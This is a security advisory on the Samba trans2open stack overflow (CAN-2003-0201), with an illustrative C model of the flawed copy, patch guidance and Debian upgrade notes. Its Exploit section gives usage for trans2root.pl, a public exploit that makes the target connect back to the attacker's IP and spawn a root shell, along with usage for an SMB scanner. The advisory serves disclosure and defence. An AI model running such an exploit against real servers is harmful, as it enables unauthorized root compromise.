o Product description: Samba is an Open Source/Free Software suite that provides seamless file and print services to SMB/CIFS clients. Samba-TNG was originally a fork of the Samba source tree, and aims at being a substitute for a Windows NT domain controller.

o Problem description: An anonymous user can gain remote root access due to a buffer overflow caused by a StrnCpy() into a char array (fname) using a non-constant length (namelen).

StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */

In the call_trans2open function in smbd/trans2.c, the Samba StrnCpy function copies pname into fname with namelen as the bound. Because namelen is assigned the value strlen(pname)+1, the bound is derived from the attacker-supplied name rather than from the size of the destination, so a name longer than fname overflows it.

The variable 'fname' is a pstring, a typedef for a char array of 1024 bytes. If pname is longer than 1024 bytes, the copy runs past the end of fname and the attacker controls everything written beyond the 1024th byte, up to the size of pname. That size is in turn bounded by the total parameter count the client supplies, the value returned by SVAL(inbuf,smbd_tpscnt) in function reply_trans2(), which allows around 2000 bytes.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2003-0201 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

o Testing Environment: Tested against source compiles and binary packages of Samba from version 2.2.5 to 2.2.8 on the following x86 platforms:

o Solutions and Workarounds: Upgrading to the latest version of Samba or Samba-TNG is the recommended solution to this vulnerability. Samba version 2.2.8a and Samba-TNG version 0.3.2 are not vulnerable. There will be no new releases for the 2.0 line of Samba code. The only fix for Samba 2.0 is to apply the patches that Samba is providing.

A workaround in the current source code for this specific vulnerability would be to modify the StrnCpy line found at line 250 in smbd/trans2.c in the Samba 2.2.8 source code:
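The advisory's own modified StrnCpy line is not reproduced on this page. As an added illustration of the pattern described above (a copy bound derived from the attacker-supplied name instead of the destination) and of the destination-bounded copy a workaround needs, here is a small stand-alone C model written for this page; it is example code, not Samba's source. It assumes a 1024-byte pstring as the advisory states, reimplements StrnCpy() with the "n bytes plus a terminating NUL" behaviour of the Samba 2.2.x helper (an assumption about the original, noted in the comments), and constructs its own sample names. The function names trans2open_overrun, copy_name_bounded and the wrappers around them are this example's, not Samba's. Rather than actually overrunning a stack buffer, it computes how far the vulnerable call would write past fname for a given name length and contrasts that with the bounded copy.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Samba 2.2.x pstring: a fixed 1024-byte char array (per the advisory). */
#define PSTRING_LEN 1024
typedef char pstring[PSTRING_LEN];

/* Stand-in for Samba's StrnCpy() (assumed behaviour of the 2.2.x helper):
 * copies at most n bytes of src, then always writes a terminating NUL,
 * so it can touch n+1 bytes of dest. The bound n comes from the caller. */
static char *StrnCpy(char *dest, const char *src, size_t n)
{
    char *d = dest;
    while (n-- && (*d++ = *src++))
        ;
    *d = '\0';
    return dest;
}

/* Builds a name of the given length (all 'A') as a constructed stand-in
 * for the attacker-supplied path in a TRANS2_OPEN request. */
static const char *constructed_name(size_t len)
{
    static char buf[4096];
    if (len >= sizeof(buf))
        len = sizeof(buf) - 1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

/* The vulnerable pattern from call_trans2open(): namelen is derived from
 * the name itself, never from the destination. Instead of performing the
 * overrun, return how many bytes the call would write past a pstring
 * (0 means the copy fits). */
size_t trans2open_overrun(const char *pname)
{
    size_t namelen = strlen(pname) + 1;   /* as in the vulnerable code */
    size_t written = namelen + 1;         /* StrnCpy writes n bytes + NUL */
    return written > sizeof(pstring) ? written - sizeof(pstring) : 0;
}

/* Hardened form: bound the copy by the destination. Returns 0 when the
 * whole name fits, -1 when it had to be truncated (a real server should
 * then reject the request rather than open a silently shortened path). */
int copy_name_bounded(pstring fname, const char *pname)
{
    size_t namelen = strlen(pname);
    if (namelen >= sizeof(pstring)) {
        /* copies 1023 bytes; the NUL lands at index 1023: 1024 bytes total */
        StrnCpy(fname, pname, sizeof(pstring) - 1);
        return -1;
    }
    StrnCpy(fname, pname, namelen);       /* NUL lands at index namelen <= 1023 */
    return 0;
}

/* Convenience wrappers over a constructed name of the given length. */
size_t overrun_for_length(size_t len)
{
    return trans2open_overrun(constructed_name(len));
}

int bounded_copy_rc(size_t len)
{
    pstring fname;
    return copy_name_bounded(fname, constructed_name(len));
}

size_t bounded_copy_len(size_t len)
{
    pstring fname;
    copy_name_bounded(fname, constructed_name(len));
    return strlen(fname);
}

int main(void)
{
    size_t lens[] = { 7, 1022, 1023, 2000 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        size_t n = lens[i];
        printf("name length %4zu: vulnerable call overruns fname by %4zu byte(s); "
               "bounded copy rc=%d, stored %4zu bytes\n",
               n, overrun_for_length(n), bounded_copy_rc(n), bounded_copy_len(n));
    }
    return 0;
}
```

The 1023-byte case is worth noting: strlen(pname)+1 equals sizeof(pstring), so the copied bytes fit exactly, but the trailing NUL that StrnCpy() always appends still lands one byte past the array. A bound that looks "off by the terminator" is enough to corrupt the adjacent stack slot; a 2000-byte name, which the trans2 parameter count permits, overruns by close to a kilobyte.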

As a result of this vulnerability being identified at least three others have also been found by the Samba team after reviewing similar usages in the source tree. One is a static overflow and the other two are heap overflows. Applying the fix above will only protect against the specific problem identified in this advisory. To fully protect yourself, you must apply the patches from Samba, or upgrade to 2.2.8a.

o Exploit: An exploit named trans2root.pl has been posted on the Digital Defense, Inc. website. A quick UDP-based scanner named nmbping.pl has also been posted to assist you in identifying Samba servers on your network. Both are available for download from the following URL:

This exploit works against all distributions listed in the testing environment section. Usage is as follows:

trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>

This exploit should work against all x86 Linux, Solaris, and FreeBSD hosts running the 2.2.x branch of Samba. This particular exploit does not work against hosts with a non-executable stack, although the underlying overflow is still present on them. The exploit will cause the target host to connect back to the host running the exploit and spawn a root shell on the defined port (default is 1981).

The scanner is very easy to use, and should detect and identify Samba and Windows SMB services. Usage is as follows:

nmbping.pl <network/cidr>

o Forced Release: This vulnerability is being actively exploited in the wild. Digital Defense, Inc. discovered this bug by analyzing a packet capture of an attack against a host running Samba 2.2.8. The attack captured was performed on April 1st, 2003. Samba users are urged to check their Samba servers for signs of compromise. Samba and Digital Defense, Inc. decided to release their advisories before all vendors had a chance to update their packages due to this vulnerability being actively exploited.

Digital Defense, Inc. has alerted the Samba Team to a serious vulnerability in Samba, a LanManager-like file and printer server for Unix. This vulnerability can lead to an anonymous user gaining root access on a Samba serving system. An exploit for this problem is already circulating and in use.

Since the packages for potato are quite old it is likely that they contain more security-relevant bugs than we know of. You are therefore advised to upgrade your systems running Samba to woody soon.

Unofficial backported packages from the Samba maintainers for version 2.2.8 of Samba for woody are available at <http://people.debian.org/~peloy/> and <http://people.debian.org/~vorlon/>.

For the stable distribution (woody) this problem has been fixed in version 2.2.3a-12.3.

For the old stable distribution (potato) this problem has been fixed in version 2.0.7-5.1.

The unstable distribution (sid) is not affected since it contains version 3.0 packages already.

We recommend that you upgrade your Samba packages immediately.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below: